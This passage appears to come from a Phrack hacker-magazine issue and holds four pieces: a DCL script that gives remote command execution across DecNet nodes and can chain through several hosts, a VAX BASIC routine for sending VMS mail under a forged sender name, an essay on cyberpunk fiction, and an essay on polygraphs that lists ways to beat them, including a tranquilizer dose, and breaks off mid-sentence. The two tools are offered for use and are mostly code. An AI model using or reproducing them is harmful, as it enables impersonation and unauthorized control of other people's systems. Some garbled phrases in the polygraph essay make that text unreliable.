      fluke      John Fluke Manufacturing, Everett, WA
      gryphon    Trailing Edge Technology, Redondo Beach, CA
      handel     Colorodo State Univ., CS Dept., Ft. Collins, CO
      hoptoad    Nebula Consultants, San Francisco, CA
     *hplabs     Hewlett Packard Research Labs, Palo Alto, CA
      ide        Interactive Development Environments, San Francisco, CA
      idi        Intelligent Decisions, Inc., San Jose, CA
      imagen     Imagen Corp., Santa Clara, CA
      intelca    Intel Corp., Santa Clara, CA
      limbo      Intuitive Systems, Los Altos, CA
      logitech   Logitech, Inc., Palo Alto, CA
      megatest   Megatest Corp., San Jose, CA
      metaphor   Metaphor Corp., Mountain View, CA
      microsoft  Microsoft, Bellevue, WA
      mindcrf    Mindcraft Corp., Palo Alto, CA
      mips       MIPS Computer Systems, Mountain View, CA
      mntgfx     Mentor Graphics Corp., Beaverton, OR
      mordor     Lawrence Livermore National Lab, Livermore, CA
      mtu        Michigan Tech Univ., Houghton, MI
      mtxinu     Mt. Xinu, Berkeley, CA
      nsc        National Semiconductor Corp., Sunnyvale, CA
      oli-stl    Olivetti Software Techn. Lab, Menlo Park, CA
      oracle     Oracle Corp., Belmont, CA
     *pacbell    Pacific Bell, San Ramon, CA
      parcplace  Parc Place Systems, Palo Alto, CA
      purdue     Purdue University, West Lafayette, IN
     *pyramid    Pyramid Technology Corporation, Mountain View, CA
      qubix      Qubix Graphic Systems, San Jose, CA
      quintus    Quintus Computer Systems, Mountain View, CA
      research   AT&T Bell Laboratories, Murray Hill, NJ
      riacs      Res.Inst. for Adv. Compu. Sci., Mountain View, CA
      rtech      Relational Technology Inc., Alameda, CA
      sci        Silicon Compilers, San Jose, CA
      sco        Santa Cruz Operation, Santa Cruz, CA
      sequent    Sequent Computer System, Inc., Beaverton, OR
      sgi        Silicon Graphics, Inc., Mountain View, CA
      shell      Shell Development Corp., Houston, TX
      simpact    Simpact Assoc., San Diego, CA
      sjsca4     Schlumberger Technologies, San Jose, CA
      sun        Sun Microsystems, Mountain View, CA
      td2cad     Intel Corp., Santa Clara, CA
      teraida    Teradyne EDA Inc., Santa Clara, CA
      theta      Process Software Inc., Wellesley, MA
      turtlevax  CIMLINC, Inc, Palo Alto, CA
     *ucbvax     University of California, Berkeley, CA
      utcsri     Univ. of Toronto, Computer Science, Toronto, CA
      vlsisj     VLSI Technology Inc., San Jose, CA
      wyse       Wyse Technology, San Jose, CA
      zehntel    Zehntel, Inc., Walnut Creek, CA
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 30, File #6 of 12

                   Decnet Hackola : Remote Turist TTY (RTT)
                   ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

                           A Late-Night Creation Of

                                   *Hobbit*

This VMS network frob is yet another "tell"-type thing.  This one has an
uncommon feature though:  recursion (i.e. you can be connected to some host
and open *another* connection to a third host and it will [attempt to!] "do the
right thing").  Also, you can ^Y out and if you run it again, it will return to
the open connection instead of starting a new one.

_H*


*************************************************************************
$! RTT -- Remote Turist TTY interface.  Do @RTT hostname or @RTT area.node
$! to start; this file must exist in the remote machine's default area.
$! You can ^Y out and the network channel will stick around; invoking RTT
$! again will resume the extant process and ignore arguments.
$! If we are a network object, play server, if not, we must be the client.
$! If we are called while already playing server, recurse to the end host.
$! This recursion in theory can happen infinite times.  Make damn sure
$! what you call this file and the "task=" spec jive, and that they are the
$! same file, or you will fall victim to very vicious timing screws.
$!
$! Another result of *Hobbit* abusing network file jobs until well past dawn.
$!
$! _H*
$set noon
$if f$mode().eqs."NETWORK".and.p1.eqs."" then $goto srv
$! Talking to a luser, go find the net job
$magic=0                        ! assume top level
$if f$trnlnm("nf",,,,,"table_name").nes."" then $goto lread
$sl=f$len(p1)
$dot=f$locate(".",p1)           ! area.node
$if sl.eq.dot then $goto nopen  ! no dot, treat normally
$q=f$loc("""",p1)               ! access control??
$node=f$ext(0,dot,p1)           ! area
$dot=dot+1                      ! point past it now
$node=node*1024+f$ext(dot,q-dot,p1)  ! and pull out the complete node
$rest=""""+f$ext(q,80,p1)+""""  ! superquotify the quotes [yeccchh!]
$p1="''node'''rest'"            ! add remains in stringwise [ack barf]
$! We were called with an argument; but if we're network mode, we're *already*
$! a server, so do special things.
$nopen: $if f$mode().eqs."NETWORK" then $magic=1
$! Top-level user process or recursed here: client connect
$open/read/write/err=yuk nf 'p1'::"0=rtt"
$read/time=5/err=yuk nf hprm    ! let other end tell us where we got
$prm==hprm                      ! global prompt str so we resume correctly
$write sys$output "Connection open"
$if magic then $goto m_setup
$lread: $read/prompt="''prm'$ "/end=lclose sys$command line
$write nf line                  ! send the sucker and go get the stuff
$ltype: $read/time=8/err=tmo/end=lclose nf line
$if line.eqs."%%eoc%%" then $goto lread
$if line.eqs."%%magic%%" then $goto newprm
$write sys$output line
$goto ltype
$newprm: $read nf hprm          ! new prompt gets piped in from servers
$prm==hprm                      ! let us find it
$read nf line                   ! garbola %%eoc%% -- avoid timing fuckup
$if line.nes."%%eoc%%" then $goto hpe  !! oops !!
$goto lread
$tmo: $write sys$output "[Timed out]"   ! supposed to bail out on a fuckup
$goto lread                             ! it doesn't always work, though.
$!
$! Do a special dance when we're recursing
$m_setup: $write nnn "%%magic%%"
$write nnn prm                  ! notify client end of new connection
$signal                         ! flush the inbetweens
$goto rread                     ! and drop to magic server
$!
$srv:                           ! Normal remote task half
$! This is an unbelievable kludge.  You can't just open sys$net: and then
$! have program output go there as well as the control thingies, but you
$! *can* pipe everything to your sys$net-opened-device: and it *works*!
$open/read/write/err=yuk nnn sys$net:
$close sys$output               ! netserver.log?
$close sys$error
$magic=0                        ! not recursing yet
$! Some handy symbols for the far end
$rtt:==@sys$login:rtt           ! make further connects easier
$ncp:==$ncp                     ! for hacking the network
$signal:==write nnn """%%eoc%%""" ! magic sync string
$write nnn f$trnl("sys$node","lnm$system_table")        ! HELO...
$def/pr sys$output nnn:         ! the awful kludge is invoked
$def/pr sys$error nnn:          ! for error handling too
$!
$! Server loop
$rread: $read/end=rclose nnn line
$if magic then $goto passing
$'line'
$m_cmd_end: $signal             ! signal for all completions
$goto rread
$! If we're magically in the middle, handle differently
$passing: $write nf line
$mtype: $read/time=5/err=mclose/end=mclose nf line
$if line.eqs."%%eoc%%" then $goto m_cmd_end
$write nnn line
$goto mtype
$!
$! Closure and error handlers
$! General protocol error catch
$yuk: $write sys$output "Couldn't open network!"
$exit
$! Here if the luser typed ^Z
$lclose: $close nf              ! should signal eof at far end
$exit
$! Here if we got hung up on by the client
$rclose: $if magic then $close nf
$close nnn
$stop/id=0
$! Here if we're magic and our remote server exited: tell client whats flying
$mclose: $close nf
$magic=0
$write nnn "%%magic%%"
$write nnn f$trnl("sys$node","lnm$system_table")
$signal
$goto rread
$! Here if we recursed down the line there and didn't see the right things
$hpe: $write sys$output "!!Hairy protocol error!!"
$close nf
$exit
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.=

                     Volume Three, Issue 30, File #7 of 12

                             =-------------------=

                               VAX/VMS Fake Mail

                                by Jack T. Tab

                             =-------------------=


In the August 1986 issue of VAX PROFESSIONAL, the BASIC subroutine that appears
at the end of this text was published.  It was not until more than two years
later that DEC included a callable mail interface with VMS 5.x.  While the
official version is much more extensive, the routine included here has one
important feature.  The ability to have a mail message appear to be from
someone else is a good addition to most "toolkits."

VMS Mail works in two manners.  The first is the familiar interactive.  The
second is as a network object.  In this method, MAIL is invoked by the
NETSERVER.COM command procedure in response to an incoming connect request.
MAIL.EXE is activated as network object 27.  The other network objects can be
viewed by using the NCP command SHOW KNOWN OBJECTS.  In this mode, MAIL.EXE
operates as a slave process, receiving instructions from the master process.
The master, in most cases, is another process running MAIL.EXE interactively.
The slave process can handle requests to deliver mail to as many recipients as
necessary.  Addresses that are not on the same node as the slave process are
forwarded by activating yet another slave process on the target node.  The
information sent by the master MAIL to the slave MAIL is quite simple and
straightforward, consisting of a series of strings.

The first string is for the FROM name.  This is what makes the subroutine
useful, as it can be anything (i.e. the_Easter_Bunny).  The next set of strings
are to whom the mail is to be sent.  One address per string, with a null
string, chr(0), terminating the list.  The third item is what the receiver(s)
sees in their TO: field.  This also can be anything.  VMS MAIL can use this
option for its .DIS distribution lists.  The final information is the body of
the message.  It too is terminated by another null string.  The subject of the
mail message is taken from the first line of this text.

The MAIL slave will send back appropriate status messages indicating problems
if they occur.  Such as "Addressee Unknown" or VMS and DECnet errors like "Disk
Quota Exceeded" or "Remote Node Not Reachable").

The only privilege that seems necessary is NETMBX.  Without it the subroutine
cannot call MAIL as a network object.  Our beloved system management resolved
the problem of people pretending to be SYSTEM by installing MAIL with NETMBX
and removing the priv from the student accounts.  The subroutine works just as
well with JNET and BITNET as it does with DECNET addresses.


***********************************CUT HERE************************************
1  %TITLE 'MAIL SUBROUTINE'

   SUB MAILT( STRING NODE, &
       STRING FROM_NAME, &
       STRING TO_LIST(), &
       STRING TO_SHOW, &
       STRING SUBJECT, &
       STRING TEXT() )

   OPTION TYPE = INTEGER

   DECLARE INTEGER FUNCTION &
     PUT_MSG

   DECLARE STRING FUNCTION &
     GET_MSG, &
     GET_INPUT

   DECLARE INTEGER CONSTANT &
     TRUE = -1, &
     FALSE = 0
   Net_Link_Open = FALSE

   Z = POS( NODE + ":" , ":" , 1)
   NODE_NAME$ = LEFT$( NODE , Z - 1 )
   ON ERROR GOTO Mail_Net_Error
   MAIL_CHANNEL = 12
   OPEN NODE_NAME$ + '::"27="' AS FILE MAIL_CHANNEL

   Net_Link_Open = TRUE

   STS = PUT_MSG( FROM_NAME )
   IF STS <> 0 THEN
     GOTO ERROR_DONE
   END IF
   RECEIVERS = 0
   TO_COUNT = 1

Mail_Recipients:
   IF TO_LIST( TO_COUNT ) = "" THEN
     GOTO End_Of_Line
   END IF
   STS = PUT_MSG( EDIT$( TO_LIST( TO_COUNT ) , 32 ) )
   IF STS <> 0 THEN
     GOTO Error_Done
   END IF
   GOSUB Errchk
   IF LINK_ERR <> 0 THEN
     GOTO Error_Done
   END IF

   IF ( ERRSTS AND 1 ) = 0 THEN
     GOTO Error_Done
   END IF

   TO_COUNT = TO_COUNT + 1
   GOTO Mail_Recipients

END_OF_LINE:
   STS = PUT_MSG( CHR$(0) )
   IF STS <> 0 THEN
     GOTO Error_Done
   END IF
   IF RECEIVERS = 0 THEN
     GOTO Mail_Done
   END IF

   STS = PUT_MSG( TO_SHOW )
   IF STS <> 0 THEN
     GOTO Error_Done
   END IF

   STS = PUT_MSG( SUBJECT )
   IF STS <> 0 THEN
     GOTO Error_Done
   END IF

   FOR I = 1 UNTIL TEXT(I) = CHR$(255)
     STS = PUT_MSG( TEXT(I) )
     IF STS <> 0 THEN
       GOTO Error_Done
     END IF
   NEXT I

   STS = PUT_MSG( CHR$(0) )
   IF STS <> 0 THEN
     GOTO Error_Done
   END IF
   SAVE_COUNT = RECEIVERS
   INDEX = 0

Delivery_Check:
   GOSUB Errchk
   IF LINK_ERR <> 0 THEN
     GOTO Error_Done
   END IF
   INDEX = INDEX + 1
   IF INDEX <> SAVE_COUNT THEN
     GOTO Delivery_Check
   END IF
   GOTO Mail_Done

Errchk:
   MAIL_STS = ASCII( GET_MSG )
   IF LINK_ERR <> 0 THEN
     ERRSTS = LINK_ERR
     RETURN
   END IF
   IF ( MAIL_STS AND 1 ) = 1 THEN
     Receivers = Receivers + 1
     ERRSTS = MAIL_STS
     RETURN
   END IF

Errmsg:
   MAIL_ERR$ = GET_MSG
   IF LINK_ERR <> 0 THEN
     ERRSTS = LINK_ERR
     RETURN
   END IF
   IF LEN( MAIL_ERR$ ) <> 1 THEN
     PRINT MAIL_ERR$
     GOTO Errmsg
   END IF
   IF ASCII( MAIL_ERR$ ) = 0 THEN
     RETURN
   ELSE
     GOTO Errmsg
   END IF

   DEF INTEGER PUT_MSG( STRING M )
   ON ERROR GOTO 1550
   MLEN = LEN( M )
   MOVE TO # MAIL_CHANNEL , M = MLEN
   PUT # MAIL_CHANNEL, COUNT MLEN
   PUT_MSG = 0
   EXIT DEF

1550 RESUME 1555

1555 PUT_MSG = ERR
     END DEF

   DEF STRING GET_INPUT( INTEGER C )
   EOF = FALSE
   ON ERROR GOTO 1650
   GET # C
   R = RECOUNT
   MOVE FROM #C , TEMP$ = R
   GET_INPUT = TEMP$
   EXIT DEF

1650 RESUME 1655

1655 EOF = TRUE
     END DEF

   DEF STRING GET_MSG
   ON ERROR GOTO 1750
   GET # MAIL_CHANNEL
   R = RECOUNT
   MOVE FROM # MAIL_CHANNEL , TEMP$ = R
   GET_MSG = TEMP$
   LINK_ERR = 0
   EXIT DEF

1750 RESUME

1755 LINK_ERR = ERR
     END DEF

Mail_Net_Error:
  RESUME 1900

1900 PRINT "%Network communications error."

Error_Done:

Mail_Done:
   IF Net_Link_Open THEN
     CLOSE MAIL_CHANNEL
   END IF

   END SUB
***********************************CUT HERE************************************


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 30, File #8 of 12

        <<===========================================================>>
        <<                                                           >>
        <<            Consensual Realities In Cyberspace             >>
        <<                                                           >>
        <<                       by Paul Saffo                       >>
        <<                Personal Computing Magazine                >>
        <<                                                           >>
        << Copyright 1989 by the Association for Computing Machinery >>
        <<                                                           >>
        <<===========================================================>>

More often than we realize, reality conspires to imitate art.  In the case of
the computer virus reality, the art is "cyberpunk," a strangely compelling
genre of science fiction that has gained a cult following among hackers
operating on both sides of the law.  Books with titles like "True Names,"
"Shockwave Rider," "Neuromancer," "Hard-wired," "Wetware," and "Mona Lisa
Overdrive," are shaping the realities of many would-be viral adepts.  Anyone
trying to make sense of the social culture surrounding viruses should add the
books to their reading list as well.

Cyberpunk got its name only a few years ago, but the genre can be traced back
to publication of John Brunner's "Shockwave Rider" in 1975.  Inspired by Alvin
Toffler's 1970 best-seller "Future Shock," Brunner paints a distopian world of
the early 21st Century in which Toffler's most pessimistic visions have come to
pass.  Crime, pollution and poverty are rampant in overpopulated urban
arcologies.  An inconclusive nuclear exchange at the turn of the century has
turned the arms race into a brain race.  The novel's hero, Nickie Haflinger, is
rescued from a poor and parentless childhood and enrolled in a top secret
government think tank charged with training geniuses to work for a
military-industrial Big Brother locked in a struggle for global political
dominance.

It is also a world certain to fulfill the wildest fantasies of a 1970s phone
"phreak."  A massive computerized data-net blankets North America, an
electronic super highway leading to every computer and every last bit of data
on every citizen and corporation in the country.  Privacy is a thing of the
past, and one's power and status is determined by his or her level of identity
code.  Haflinger turns out to be the ultimate phone phreak:  he discovers the
immorality of his governmental employers and escapes into society, relying on
virtuoso computer skills (and a stolen transcendental access code) to rewrite
his identity at will.  After six years on the run and on the verge of a
breakdown from input overload, he discovers a lost band of academic
techno-libertarians who shelter him in their ecologically sound California
commune and... well, you can guess the rest.

Brunner's book became a best-seller and remains in print.  It inspired a whole
generation of hackers including, apparently, Robert Morris, Jr. of Cornell
virus fame.  The Los Angeles Times reported that Morris' mother identified
"Shockwave Rider" as "her teen-age son's primer on computer viruses and one of
the most tattered books in young Morris' room."  Though "Shockwave Rider" does
not use the term "virus," Haflinger's key skill was the ability to write
"tapeworms" -- autonomous programs capable of infiltrating systems and
surviving eradication attempts by reassembling themselves from viral bits of
code hidden about in larger programs.  Parallels between Morris' reality and
Brunner's art is not lost on fans of cyberpunk:  one junior high student I
spoke with has both a dog-eared copy of the book, and a picture of Morris taped
next to his computer.  For him, Morris is at once something of a folk hero and
a role model.

In "Shockwave Rider," computer/human interactions occurred much as they do
today:  One logged in and relied on some combination of keyboard and screen to
interact with the machines.  In contrast, second generation cyberpunk offers
more exotic and direct forms of interaction.  Vernor Vinge's "True Names" was
the first novel to hint at something deeper.  In his story, and small band of
hackers manage to transcend the limitations of keyboard and screen, and
actually meet as presences in the network system.  Vinge's work found an
enthusiastic audience (including Marvin Minsky who wrote the afterword), but
never achieved the sort of circulation enjoyed by Brunner.  It would be another
author, a virtual computer illiterate, who would put cyberpunk on the map.

The author was William Gibson, who wrote "Neuromancer" in 1984 on a 1937 Hermes
portable typewriter.  Gone are keyboards; Gibson's characters jack directly
into Cyberspace, "a consensual hallucination experienced daily by billions of
legitimate operators... a graphic representation of data abstracted from the
banks of every computer in the human system.  Unthinkable complexity.  Lines of
light ranged in the nonspace of the mind, clusters and constellations of
data..."

Just as Brunner offered us a future of the 1970s run riot, Gibson's
"Neuromancer" serves up the 1980s taken to their cultural and technological
extreme.  World power is in the hands of multinational "zaibatsu," battling for
power much as mafia and yakuza gangs struggle for turf today.  It is a world of
organ transplants, biological computers and artificial intelligences.  Like
Brunner, it is a distopian vision of the future, but while Brunner evoked the
hardness of technology, Gibson calls up the gritty decadence evoked in the
movie "Bladerunner," or of the William Burroughs novel, "Naked Lunch" (alleged
similarities between that novel and "Neuromancer" have triggered rumors that
Gibson plagiarized Burroughs).

Gibson's hero, Case, is a "deck cowboy," a freelance corporate thief-for-hire
who projects his disembodied consciousness into the cyberspace matrix,
penetrating corporate systems to steal data for his employers.  It is a world
that Ivan Boesky would understand:  Corporate espionage and double-dealing has
become so much the norm that Case's acts seem less illegal than profoundly
ambiguous.

This ambiguity offers an interesting counterpoint to current events.  Much of
the controversy over the Cornell virus swirls around the legal and ethical
ambiguity of Morris' act.  For every computer professional calling for Morris'
head, another can be found praising him.  It is an ambiguity that makes the
very meaning of the word "hacker" a subject of frequent debate.

Morris' apparently innocent error in no way matches the actions of Gibson's
characters, but a whole new generation of aspiring hackers may be learning
their code of ethics from Gibson's novels.  "Neuromancer" won three of science
fiction's most prestigious awards -- the Hugo, the Nebula and the Philip K.
Dick Memorial Award -- and continues to be a best-seller today.  Unambiguously
illegal and harmful acts of computer piracy such as those alleged against Kevin
Mitnick (arrested after a long and aggressive penetration of DEC's computers)
would fit right into the "Neuromancer" story line.

"Neuromancer" is the first book in a trilogy.  In the second volume, "Count
Zero" -- so-called after the code name of a character -- the cyberspace matrix
becomes sentient.  Typical of Gibson's literary elegance, this becomes apparent
through an artist's version of the Turing test.  Instead of holding an
intelligent conversation with a human, a node of the matrix on an abandoned
orbital factory begins making achingly beautiful and mysterious boxes -- a 21st
Century version of the work of the late artist, Joseph Cornell.  These works of
art begin appearing in the terrestrial marketplace, and a young woman art
dealer is hired by an unknown patron to track down the source.  Her search
intertwines with the fates of other characters, building to a conclusion equal
to the vividness and suspense of "Neuromancer."  The third book, "Mona Lisa
Overdrive" answers many of the questions left hanging in the first book and
further completes the details of the world created by Gibson including an
adoption by the network of the personae of the pantheon of voodoo gods and
goddesses, worshipped by 21st Century Rastafarian hackers.

Hard core science fiction fans are notorious for identifying with the worlds
portrayed in their favorite books.  Visit any science fiction convention and
you can encounter amidst the majority of quite normal participants, small
minority of individuals who seem just a bit, well, strange.  The stereotypes of
individuals living out science fiction fantasies in introverted solitude has
more than a slight basis in fact.  Closet Dr. Whos or Warrior Monks from "Star
Wars" are not uncommon in Silicon Valley; I was once startled to discover over
lunch that a programmer holding a significant position in a prominent company
considered herself to be a wizardess in the literal sense of the term.

Identification with cyberpunk at this sort of level seems to be becoming more
and more common.  Warrior Monks may have trouble conjuring up Imperial
Stormtroopers to do battle with, but aspiring deck jockeys can log into a
variety of computer systems as invited or (if they are good enough) uninvited
guests.  One individual I spoke with explained that viruses held a special
appeal to him because it offered a means of "leaving an active alter ego
presence on the system even when I wasn't logged in."  In short, it was the
first step toward experiencing cyberspace.

Gibson apparently is leaving cyberpunk behind, but the number of books in the
genre continues to grow.  Not mentioned here are a number of other authors such
as Rudy Rucker (considered by many to be the father of cyberpunk) and Walter
John Williams who offer similar visions of a future networked world inhabited
by human/computer symbionts.  In addition, at least one magazine, "Reality
Hackers" (formerly "High Frontiers Magazine" of drug fame) is exploring the
same general territory with a Chinese menu offering of tongue-in-cheek
paranoia, ambient music reviews, cyberdelia (contributor Timothy Leary's term)
and new age philosophy.

The growing body of material is by no means inspiration for every aspiring
digital alchemist.  I am particularly struck by the "generation gap" in the
computer community when it comes to "Neuromancer":  Virtually every teenage
hacker I spoke with has the book, but almost none of my friends over 30 have
picked it up.

Similarly, not every cyberpunk fan is a potential network criminal; plenty of
people read detective thrillers without indulging in the desire to rob banks.
But there is little doubt that a small minority of computer artists are finding
cyberpunk an important inspiration in their efforts to create an exceedingly
strange computer reality.  Anyone seeking to understand how that reality is
likely to come to pass would do well to pick up a cyberpunk novel or two.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 30, File #9 of 12
                      ___________________________________
                     |                                   |
                     |   The Truth About Lie Detectors   |
                     |_______                     _______|
                             |  by Razor's Edge  |
                             |                   |
                             | November 10, 1989 |
                             |___________________|

Americans love gadgets, so it is not hard to explain the popularity of the lie
detector.  Many people believe in the validity of lie detectors because the
instruments and printouts resemble those used by doctors and others who collect
scientific data and because lie detectors are simple, convenient shortcuts to
hard complicated decisions.  Polygraphy is fast becoming an American obsession
-- an obsession, incidentally, not shared by the British or the Europeans or,
as far as we know, the Russians.

American industry's increasing dependence on the polygraph reflects an enormous
faith in the rational processes of science.  Each of us can recall a time when
our voices sounded funny as we told a lie.  Surely, if we can "hear" a lie,
science can detect one.  It comes as a disturbing shock, therefore, to learn
how fragile the polygraph's scientific foundations really are.

The roots of the lie detector, more formally known as the polygraph, go back to
the turn of the century, when infatuation with the newly discovered powers of
electricity more than once overcame common sense.  But whereas electric hair
restorers and high-voltage cancer cures have all but vanished, the polygraph
persists and even flourishes.  According to the best estimates, over one
million polygraph examinations are administered each year in the united States.
They are used in criminal investigations, during government security checks,
and increasingly by nervous employers -- particularly banks and stores.  In
certain parts of the country, a woman must pass a lie detector test before the
authorities will prosecute a rape.  In 1983 the television show Lie Detector
added the dimension of home entertainment to polygraph tests.

The National Security Agency (NSA) leads the roster of federal polygraph users;
both it and the CIA rely heavily on polygraph testing for pre-employment and
routine security screening.  The NSA reported giving nearly 10,000 tests in
1982 (CIA numbers are classified).  Those who are labeled "deceptive" often
lose their jobs, even if there is no actual evidence against them.  Moreover,
the polygraph report may become a permanent part of an employee's records, and
it will be extremely difficult to compel a correction.

With the arrest in June 1985 of four Navy men on espionage charges, the issue
of using polygraphs to uncover spies or ferret out dishonest job seekers has
come to the forefront of the debate about what should be done to stem the loss
of defense and company secrets and to dispel potential thieves in the
workplace.

Much the same issue is at the heart of the protracted wrangle between the
Reagan Administration and Congress over plans for expanded government use of
the polygraph.  An executive order issued on March 11, 1983, known as National
Security Decision Directive 84, would have sanctioned for the first time
"adverse consequences" for a federal employee who refuses to take a test when
asked.  The directive authorized tests to investigate candidates for certain
security clearances and to ask any federal employee about leaks of classified
information.  (This directive was issued shortly after Reagan's comment about
being "up to my keister" in press leads.)  Almost simultaneously the Department
of Defense (DOD) released a draft regulation that authorized use of the
polygraph to screen employees who take on sensitive intelligence assignments;
it, too, prescribed adverse consequences for refusal.

Critics of the polygraph maintain that its use represents an invasion of
privacy, especially when the coercive power of the government or an employer is
behind the application.  It is hard for a job applicant to say no when a
prospective employer asks him or her to take a polygraph test; once hooked up
to the machine, the applicant may face questions not only about past criminal
activity but also about matters that an employer may have no business intruding
upon, such as sexual practices or gambling -- questions asked ostensibly to
assess the applicant's "character."  As a result of such abuses, nineteen
states and the District of Columbia have made it illegal for an organization to
ask its employees to take polygraph examinations.

A question more basic than whether the polygraph is an unacceptable invasion of
privacy is, of course, whether it works.  Seeking an answer in the scientific
literature can be a bewildering experience.  A report by the Office of
Technology Assessment (OTA), commissioned in 1983 by Brooks's Committee on
Government Operations, summed up the problem by citing twenty-four studies that
found correct detection of guilt ranging from 35% to 100%.

Polygraph theory thrives on a sort of Pinocchio vision of lying, in which
physiological reactions -- changes in blood pressure or rate of breathing or
sweating of the palms -- elicited by a set of questions will reliably betray
falsehood.  Lying, goes the rationale, is deliberate, and the knowledge and
effort associated with it will make a person upset enough to display a physical
reaction like a speedup of the heartbeat.  The variables measured usually
include the galvanic skin response (GSR), blood pressure, abdominal
respiration, and thoracic respiration.  The GSR is measured by fingertip
electrodes that produce changes in the electrical resistance in the palms when
they are sweating.  The blood pressure and pulse are monitored through a system
that uses a sphygmomanometer cuff, which is usually attached to the biceps
(this is similar to the way doctors measure blood pressure).  There is no
"specific lie response."  The polygraph merely records general emotional
arousal.  It does not distinguish anxiety or indignation from guilt.  The real
"lie detector" is the operator, who interprets the various body responses on
the machine's output.

Polygraphers claim that it is the form and mix of questions that are the keys
to their success.  The standard format, known as the Control Question Test,
involves interspersing "relevant" questions with "control" questions.  Relevant
questions relate directly to the critical matter:  "Did you participate in the
robbery of the First National Bank on September 11, 1981?"  Control questions,
on the other hand, are less precise:  "In the last twenty years, have you ever
taken something that did not belong to you?"

In the pretest interview, the polygrapher reviews all the questions and frames
the control questions to produce "no" answers.  It is in this crucial pretest
phase that the polygrapher's deception comes into play, for he wants the
innocent subject to dissemble while answering the control questions during the
actual test.

The assumption underlying the Control Question Test is that the truthful
subject will display a stronger physiological reaction to the control
questions, whereas a deceptive subject will react more strongly to the relevant
questions.  That is the heart of it.  Modern lie detection relies on nothing
more than subtle psychological techniques, crude physiological indicators, and
skilled questioning and interpretation of the results.

Critics claim that polygraphy fails to take the complexities of lying into
account.  For some people lying can be satisfying, fulfilling, exciting, and
even humorous, depending on their reasons for lying.  Other people feel little
or no emotion when lying.  Still others believe their lies and think they are
telling the truth when they are not.  Moreover, the theory holds that deception
produces distinctive physiological changes that characterize lying and only
lying.  This notion has no empirical support.  Quite the contrary:  Lying
produces no known distinctive pattern of physiological activity.

Undeniably, when being dishonest, people can feel great turmoil and a polygraph
can measure this turmoil.  But when apprehensive about being interrogated, they
can give a similar emotional reaction:  When they think they are losing the
chance for job openings or their jobs are on the line, when they reflect on the
judgements that could be made about their answers, or, for that matter, when
they are angry, puzzled, or even amused by the impertinent probing of a total
stranger.  Some control questions may make a person appear guilty.  Such
questions may force a subject into a minor lie or ask about an invented crime
that nonetheless makes the subject nervous.

Lie detectors are especially unreliable for truthful people.  Many more
innocent people test as "deceptive" than guilty people test as "innocent."
Those who run a special risk include people who get upset if someone accuses
them of something they didn't do, people with short tempers, people who tend to
feel guilty anyway, and people not accustomed to having their word questioned.
All of these feelings can change heart rate, breathing, and perspiration and
their heightened feelings are easily confused with guilt.

It has also been shown that polygraphs are easily manipulated.  Four hundred
milligrams of the tranquilizer meprobamate taken an hour or two before a
polygraph session can make it virtually impossible to spot a liar by his
physiological responses.  In fact, some researchers even argue that an examinee
can use simple countermeasures, such as biting one's tongue, gouging oneself
with a fingernail, or stepping on a nail concealed in a shoe, to fake a strong
reaction to the control questions, thus "beating" the test.  According to one
researcher, one prison inmate, who became the jail-house polygraph expert after
studying the literature, trained twenty-seven fellow inmates in the seat
techniques; twenty-three beat the polygraph tests used tons investigate
violations of prison rules.  However, do not try sighing, coughing, or
clenching your fist or arm.  Polygraphers usually are suspicious of those
techniques and may label you "deceptive" for that reason alone.

It should be obvious that the interpretation of the results of any polygraph
test will certainly be very difficult.  Also, not all responses on the machine
will agree.  What are the present qualifications for a polygrapher?  Most of
the twenty-five or more schools that train examiners provide only an eight-week
course of instruction and require two years of college for admission.  This is
about one-sixth the study time of the average barber college.  Perhaps as many
as a dozendy time of contemporary polygraphers do hold Ph.D's, but the vast
majority of the 4,000 to 8,000 practicing examiners had no simple significant
training in physiology or in psychology, even though lie detection demands
extremely subtle and difficult psychophysiological interpretations.  There are
no licensing standards for polygraph operators, and, with so many poorly, who
trained operators, thousands of tests are conducted hastily and haphazardly,
resulting in highly questionable accuracy.  For many innocent people, their
judge and jury are these unskilled operators.

Honesty is also difficult to predict because it tends to be situation-
specific.  Therefore, it is more dependent on motivation and opportunity than
on some personality trait.  As Bertrand Russell once said, "Virtue is dictated
by results of circumstance."

Proponents of the polygraph sometimes cite "correct guilty detections":  The
percentage of guilty subjects who are caught by the polygraph.  This figure can
be very impressive:  In one study that does not suffer from the failings
already mentioned, it was 98% correct.  But the same study found that 55% of
innocent subjects were also diagnosed as "deceptive."  The handful of studies
that used a truly random selection of cases and scored them blind produced
similar results:  Overall, 83% of guilty subjects were diagnosed as
"deceptive," as were 43% of innocent subjects.  It's no trick to push the rate
of correct guilty detections to 100% -- just call everyone "deceptive."  You
don't even need a machine to do that!

Nature published its conclusions last year.  Their aggregated findings were
based on the polygraph charts of 207 criminal suspects, which 14 polygraphers
scored independently.  On the average, they erroneously diagnosed 43% of
innocent suspects as deceptive. Such errors, called false positives, ranged as
high as 50%.  The corresponding errors of deceptive persons "passing the test,"
or false negatives, were as high as 36%.

The accuracy rates of "failed" and "passed" depend, of course, on the
proportion of dishonest persons in the group tested.  Thus, if 800 of 1,000
persons tested are truthful, a test that is 72% accurate overall will accuse
144 liars and 224 truthful persons.  This is not an impressive accuracy record.

These numbers suggest that the polygraph test is biased against innocent
people.  The problem is accentuated when the test is used in the screening
situations envisioned in the Reagan Administration proposals (and already
established at the NSA and the CIA).  Everyone is tested, but presumably only a
very small proportion has done anything wrong.  If we assume that one employee
in a hundred is a spy (probably a gross overestimate), and if we use the 83%
correct-guilty-detection rate, we find that 51 innocent persons will flunk the
polygraph test for every real spy who flunks.  Any test, whether it is for
truth or for cancer, has to be extremely accurate to detect a rare phenomenon
without setting off a lot of false alarms in the process.  Even if the test
were 99% accurate for both guilty and innocent detections, one innocent person
would be falsely branded for each spy caught.  Because of this "case rate"
problem, the FBI forbids the use of polygraph dragnets:  The tests can be used
only after an initial investigation has narrowed the field of suspects.

Given all the doubts about their validity, why does the government persist in
using polygraph tests?  Some clues are found in the DOD 1983 report on
polygraph testing -- even in its title, "The Accuracy and Utility of Polygraph
Testing" which suggests that accuracy and utility are two different things.
The most that report concludes about accuracy is that it is "significantly
above chance."  Utility, however, is quite another matter.  Perhaps the most
telling statement about lie detectors comes from former president Nixon, who
